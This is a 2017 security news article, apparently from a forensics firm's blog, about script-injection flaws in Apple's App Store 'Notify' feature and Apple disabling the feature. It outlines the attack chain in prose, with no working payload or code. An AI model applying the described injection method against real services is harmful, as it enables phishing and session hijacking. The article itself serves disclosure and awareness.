January 24, 2017 by

Hacker Finds Glaring Vulnerabilities in Apple’s Notification Feature

A buggy new notification feature that was found to contain multiple significant vulnerabilities by a security researcher has seen Apple pullback and disable the feature entirely.

Released for users of the iPhone and iPad, Apple introduced a “Notify” button in November 2016, one that provided alerts to users when any game or application became available on the App Store. Whilst successful for a number of obvious reasons, security researcher Benjamin Kunz Merjri from Vulnerability Lab discovered multiple flaws in the Notify feature.

An excerpt from the description of the vulnerability, as described by the researcher reads:

An application0side input validation web vulnerability has been discovered in the official Apple – App Store and iTunes Store online-service web-application. The vulnerability allows remote attackers to inject own malicious script codes on the application-side of the vulnerable context function or service module.

Fundamentally, a successful exploitation of the vulnerability could lead to persistent phishing attacks, a complete session hijack, persistent manipulation of affected services or connected service module context.  The exploit could even lead to a persistent redirect to external sources.

The Exploit

Multiple vulnerabilities in the iTunes application and the App Store’s iOS ‘Notify’ function are exploited as a part of the attack. When the notify button is clicked to enable the feature for any unreleased app or game, the subsequent function sees an automatic retrieval of personal information from the user’s device. The primary iCloud email ID is snatched, so too is the devicename value. This latter parameter, however, is vulnerable to a persistent input validation flaw. This vulnerability allows an attacker to insert malicious javascript into the devicename field, as payload. Upon successful exploitation, the payload is bound to get executed.

The second vulnerability surfaces when the remote attacker is allowed to set the victim’s iCloud email ID as his/her primary email address. This, without any approval or confirmation required from the victim’s side. In essence, whenever an unreleased app becomes available, Apple will, by default, send an email to the victim’s address, compromised by the attacker. When the victim finally receives that email from Apple, it will contain the malicious payload inserted by the attacker.

The third and final flaw is with Apple’s email client, which fails to scan the content of the email as the malicious payload is bound to get executed on the victim’s end.

Apple has been notified of the issue and is currently working toward a fix.

Image credit: Pexels.

About the author

Image of Author

LIFARS is the global leader in Digital Forensics and Cyber Resiliency Services. Our experience spans two decades working on high profile events, often in concert with Law Enforcement Agencies around the world. Our proprietary methodology derives directly and indirectly from our experience working with and for U.S. Intelligence Agencies, Interpol, Europol, and NATO. We are solely dedicated to Cyber Resiliency and thus pay close attention to all aspects of our clients’ engagements experience while providing a strategic and integrated array of services to minimum risk and disruption while protecting your brand.

Related articles

Apple Partners Allianz to Offer CyberCrime Insurance Perks

A new partnership between Apple, Cisco and insurance firm Allianz SE will see businesses using...

Read more arrow_forward

Happy New Year: Researcher Drops MacOS Zero-Day Root Access Kernel Exploit

To ring in the new year, a security researcher on New Year’s Day disclosed an unpatched security...

Read more arrow_forward

Apple Pushes Update to Fix Major Mac OS Vulnerability

Apple has issued an emergency patch after admitting to a major security flaw that enabled anyone to...

Read more arrow_forward